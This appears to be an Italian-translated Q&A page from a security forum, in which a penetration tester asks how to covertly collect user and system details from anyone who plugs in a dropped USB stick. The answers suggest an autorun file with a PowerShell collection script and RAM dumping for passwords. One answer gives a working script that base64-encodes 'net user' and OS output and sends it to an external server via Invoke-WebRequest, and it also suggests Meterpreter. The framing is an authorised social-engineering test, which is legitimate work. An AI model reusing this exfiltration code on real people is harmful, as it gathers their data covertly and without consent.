Ottieni informazioni sul computer (nome utente registrato) segretamente usando l'unità USB

1

Ho uno scenario in cui devo fare un esercizio di ingegneria sociale per un cliente. L'esercizio è il semplice vecchio trucco USB gratuito, ma il problema è che devo solo ottenere le informazioni (non dannose) del computer / utente che inserisce l'USB e non accedere direttamente al loro sistema che può essere fatto usando il Social Toolkit di ingegneria disponibile in Backtrack.

Qualche idea o suggerimento su come potrei farlo?

    
posta user1299086 19.10.2016 - 09:42
fonte

2 risposte

1

Come probabilmente saprai,

The SET Infectious Media Generator creates an autorun.inf file and a Metasploit payload Source.

Poiché non si desidera utilizzare il payload Metasploit, è sufficiente creare un file di esecuzione automatica e uno script PowerShell per la raccolta di informazioni. Esistono diversi tipi di informazioni che è possibile raccogliere, dall'utente connesso all'indirizzo MAC e così via.

Un attacco più sofisticato (che probabilmente richiederebbe autorizzazioni aggiuntive) implicherebbe il dumping della RAM dell'utente bersaglio e la ricerca di stringhe particolari, come la password. Non sono un esperto in questo argomento, ma questo potrebbe essere fatto usando strumenti che sono tipicamente usati in live forensics.

    
risposta data 19.10.2016 - 10:05
fonte
0

the catch here is that I have to only get only the (non damaging) info of the computer/user who inserts the USB and not directly access their system

Da ciò capisco che vuoi solo alcune sysinfo, non le credenziali effettive.

Script PowerShell per la pubblicazione delle informazioni in una pagina:

$userinfo = net user
$sysinfo = Get-CimInstance Win32_OperatingSystem
$Text = $sysinfo + $userinfo
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$USERDATA =[Convert]::ToBase64String($Bytes)

Invoke-WebRequest http://www.yourserver.com/submit?userdata=$USERDATA

Si prega di tenere presente che ci sono alcune limitazioni intorno alla politica di esecuzione. Penso che una soluzione molto più robusta sarebbe un Meterpreter con un AutoRunScript che raccoglie le informazioni degli utenti e termina immediatamente.

Anche il computer moderno non esegue più automaticamente autorun.inf, probabilmente avrai bisogno di un po 'di interazione con l'utente.

    
risposta data 19.10.2016 - 11:23
fonte

Leggi altre domande sui tag